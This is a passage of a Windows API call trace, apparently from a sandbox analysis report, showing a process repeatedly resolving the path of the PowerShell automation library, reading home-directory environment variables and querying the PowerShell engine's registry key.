nBufferLength=0x105, lpBuffer=0x13e258, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.188] GetLastError () returned 0xcb [0090.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.188] GetLastError () returned 0xcb [0090.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e208, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.188] GetLastError () returned 0xcb [0090.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.190] GetLastError () returned 0xcb [0090.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.190] GetLastError () returned 0xcb [0090.190] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.190] GetLastError () returned 0xcb [0090.190] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0090.190] GetLastError () returned 0xcb [0090.190] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x3953b0, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetCurrentProcessId () returned 0x578 [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.191] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.191] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e198, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.192] GetLastError () returned 0xcb [0090.192] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x13e70c | out: phkResult=0x13e70c*=0x354) returned 0x0 [0090.192] RegQueryValueExW (in: hKey=0x354, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e754, lpData=0x0, lpcbData=0x13e750*=0x0 | out: lpType=0x13e754*=0x1, lpData=0x0, lpcbData=0x13e750*=0x56) returned 0x0 [0090.192] RegQueryValueExW (in: hKey=0x354, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x13e754, lpData=0x3953b0, lpcbData=0x13e750*=0x56 | out: lpType=0x13e754*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x13e750*=0x56) returned 0x0 [0090.193] RegCloseKey (hKey=0x354) returned 0x0 [0090.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1fc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.193] GetLastError () returned 0xcb [0090.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.193] GetLastError () returned 0xcb [0090.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.193] GetLastError () returned 0xcb [0090.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e1e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.193] GetLastError () returned 0xcb [0090.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.193] GetLastError () returned 0xcb [0090.193] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13e194, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.193] GetLastError () returned 0xcb [0090.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.199] GetLastError () returned 0xcb [0090.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.199] GetLastError () returned 0xcb [0090.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.199] GetLastError () returned 0xcb [0090.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.199] GetLastError () returned 0xcb [0090.199] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d874, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d824, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.200] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x13d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0090.201] GetLastError () returned 0xcb [0090.201] GetFullPathNameW (in: 